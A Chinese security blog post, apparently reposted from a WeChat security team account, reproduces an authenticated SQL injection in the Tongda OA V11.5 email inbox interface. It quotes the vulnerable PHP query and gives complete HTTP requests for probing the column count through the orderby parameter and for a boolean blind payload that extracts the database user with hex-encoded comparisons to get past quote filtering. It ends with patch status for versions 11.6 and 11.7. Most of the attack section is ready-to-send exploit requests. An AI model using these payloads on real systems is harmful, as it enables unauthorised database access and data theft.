通达OA V11.5电子邮箱接口SQL注入复现

  • A+
所属分类:安全文章

漏洞影响版本

通达OA V11.5版本

 

漏洞利用先序条件

用户成功登陆系统(带Cookie请求)

 

漏洞代码定位

漏洞接口对应资源如下所示:
webrootgeneralemailsentboxget_index_data.php
存在问题的函数为:get_sentbox_data,该函数定义在:
webrootincutility_email.php
存在问题的关键代码如下所示:
$query = "SELECT EMAIL_ID,TO_ID,READ_FLAG,DELETE_FLAG,EMAIL_BODY.BODY_ID,TO_ID2,COPY_TO_ID,TO_WEBMAIL,SUBJECT,SEND_TIME,ATTACHMENT_ID,ATTACHMENT_NAME,IMPORTANT,SIZE,IS_WEBMAIL,WEBMAIL_FLAG from EMAIL,EMAIL_BODY where EMAIL.BODY_ID=EMAIL_BODY.BODY_ID and FROM_ID='" . $_SESSION["LOGIN_USER_ID"] . "' and SEND_FLAG='1' and DELETE_FLAG!='2' and DELETE_FLAG!='4' " . $WHERE_STR . " group by EMAIL.BODY_ID";if ($FIELD == "") { $FIELD = "SEND_TIME";}$query .= " order by " . $FIELD;if ($ASC_DESC == "1") { $query .= " asc";}else { $query .= " desc";}if ($FIELD != "SEND_TIME") { $query .= ",SEND_TIME desc";}$query .= ",EMAIL_BODY.BODY_ID desc";$query .= " limit $CURNUM,$PAGE_ZISE";$cursor = exequery(TD::conn(), $query, $QUERY_MASTER);
仅仅看上述逻辑是比较复杂的,但实际如果能够找到对应的接口,会自动触发构造对应数据包的逻辑!
在系统中触发该逻辑的模块为:
[个人事务]->[电子邮件]->[收件箱]

通达OA V11.5电子邮箱接口SQL注入复现

抓取的样例数据包如下所示:
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=SEND_TIME&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1Host: 192.168.188.128User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://192.168.188.128/general/email/inbox/?BOX_ID=0&boxname=inbox0&boxid=0Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=381781b3; PHPSESSID=5a0kcudi7nf5ds5f6d8pm3g0v6

获取表列数PoC

需要说明的是注入点为 orderby 参数,我们可以尝试在不构造 SQL 语句的前提下,对系统列数进行猜测,
当设置 orderby=16 时:
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=16&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1Host: 192.168.188.128User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://192.168.188.128/general/email/inbox/?BOX_ID=0&boxname=inbox0&boxid=0Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=381781b3; PHPSESSID=5a0kcudi7nf5ds5f6d8pm3g0v6
执行效果如下所示:

通达OA V11.5电子邮箱接口SQL注入复现

当设置 orderby=17 时:
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=17&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1Host: 192.168.188.128User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://192.168.188.128/general/email/inbox/?BOX_ID=0&boxname=inbox0&boxid=0Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=381781b3; PHPSESSID=5a0kcudi7nf5ds5f6d8pm3g0v6
执行效果如下所示:

通达OA V11.5电子邮箱接口SQL注入复现


根据以上逻辑,能说明该数据表共有16列数据
 

漏洞PoC

调整数据包内容如下:
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1+RLIKE+(SELECT+(CASE+WHEN(substr(user(),1,1)=0x72)+THEN+1+ELSE+0x28+END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1Host: 192.168.188.128User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://192.168.188.128/general/email/inbox/?BOX_ID=0&boxname=inbox0&boxid=0Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=381781b3; PHPSESSID=5a0kcudi7nf5ds5f6d8pm3g0v6
执行效果如下所示:

通达OA V11.5电子邮箱接口SQL注入复现

将 0x72 修改为 0x73 时,数据包如下所示:
GET /general/email/inbox/get_index_data.php?timestamp=&curnum=0&pagelimit=10&total=&boxid=0&orderby=1+RLIKE+(SELECT+(CASE+WHEN(substr(user(),1,1)=0x73)+THEN+1+ELSE+0x28+END))&asc=0&keyword=&emailtype=ALLMAIL&boxname=inbox&tag= HTTP/1.1Host: 192.168.188.128User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: closeReferer: http://192.168.188.128/general/email/inbox/?BOX_ID=0&boxname=inbox0&boxid=0Cookie: USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=381781b3; PHPSESSID=5a0kcudi7nf5ds5f6d8pm3g0v6
执行效果如下:

通达OA V11.5电子邮箱接口SQL注入复现

SQL语句讲解

略,与之前类似。用十六进制ascii码的原因是单引号被后台过滤了。

后续跟踪

11.6没有针对该问题进行修正。仍然可以攻击成功。
11.7已对该问题进行了修正(通过filterWords进行了过滤,另外在执行SQL语句前,增加了对 case when 这类语句的支持)

喜欢就请关注我们吧!

通达OA V11.5电子邮箱接口SQL注入复现

本文始发于微信公众号(Pai Sec Team):通达OA V11.5电子邮箱接口SQL注入复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: